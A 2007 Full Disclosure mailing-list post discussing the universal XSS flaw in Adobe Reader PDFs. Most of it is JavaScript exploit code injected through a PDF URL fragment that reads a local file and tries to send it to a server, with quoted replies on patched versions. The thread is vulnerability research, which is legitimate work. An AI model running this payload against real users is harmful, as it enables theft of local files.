Full Disclosure mailing list archives
Re: Universal XSS with PDF files: highly dangerous
From: "T Biehn" <tbiehn () gmail com>
Date: Thu, 4 Jan 2007 10:10:49 -0500
I'm trying to put together a demonstration of this vulnerability, and how it could effect corporate security, however I'm encountering a large hangup when sending a file 'back' to the webserver, the browser same origin policy denies me the ability to send files to a different domain, which afaik is necessary for an external attacker to properly exploit this vulnerability: Here's the code I have so far, based more or less on PDP's Vanilla, almost' PDP's (different url, spaces removed etc.) file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4)alert( xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); What I'm trying to do: file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert( xhr.responseText);xhr2.open('GET', ' http://localhost:80/whatever.htm?content=' + xhr.responseText);xhr2.onreadystatechage = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); Now, one would think that the LOCAL file operating mode of IE would allow the cross domain XHR request, however this does not work (tested IE 6) I think because by default IE disallows Javascript access on the local context. Try putting this is IE: file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol') ; and then try it in FireFox It won't work in IE 6, but it executes just fine in FireFox. function cXHR(){ //Grabs a legit XHR. try{ return new ActiveXObject('Msxml2.XMLHTTP'); }catch(e){} try{ return new ActiveXObject('Microsoft.XMLHTTP'); }catch(e){} try{ return new XMLHttpRequest(); }catch(e){} return null; } var xhr = cXHR(); //For grabbing var xhr2 = cXHR(); //For sending xhr.onreadystatechange = function(){ if (xhr.readyState == 4){ alert(xhr.responseText); xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText); //Send it up, yo. xhr2.onreadystatechage = function(){ alert('File Transferred!'); }; xhr2.send(null); } }; xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true); xhr.send(null); Anyone's input on this matter would be appreciated. On 1/4/07, Juha-Matti Laurio <juha-matti.laurio () netti fi> wrote:
Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8. - Juha-Matti Larry Seltzer <Larry () larryseltzer com> wrote: > >>"According to public reports, this vulnerability is addressed in Adobe > Acrobat Reader 8.0." > > I've actually tested it. On Reader 8 Acrobat you get a messagebox that > says "This operation is not allowed" > > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blog.eweek.com/blogs/larry%5Fseltzer/ > Contributing Editor, PC Magazine > larryseltzer () ziffdavis com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous, (continued)
- Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous HASEGAWA Yosuke (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous Kristina Lein (Jan 05)
- Re: Universal XSS with PDF files: highly dangerous pdp (architect) (Jan 05)
- Re: Universal XSS with PDF files: highly dangerous Stefano Di Paola (Jan 05)
- Re: Universal XSS with PDF files: highly dangerous The Anarcat (Jan 08)
- Re: Universal XSS with PDF files: highly dangerous Matthew Flaschen (Jan 08)
- Re: Universal XSS with PDF files: highly dangerous Juha-Matti Laurio (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous Larry Seltzer (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous Juha-Matti Laurio (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous T Biehn (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous pdp (architect) (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous T Biehn (Jan 04)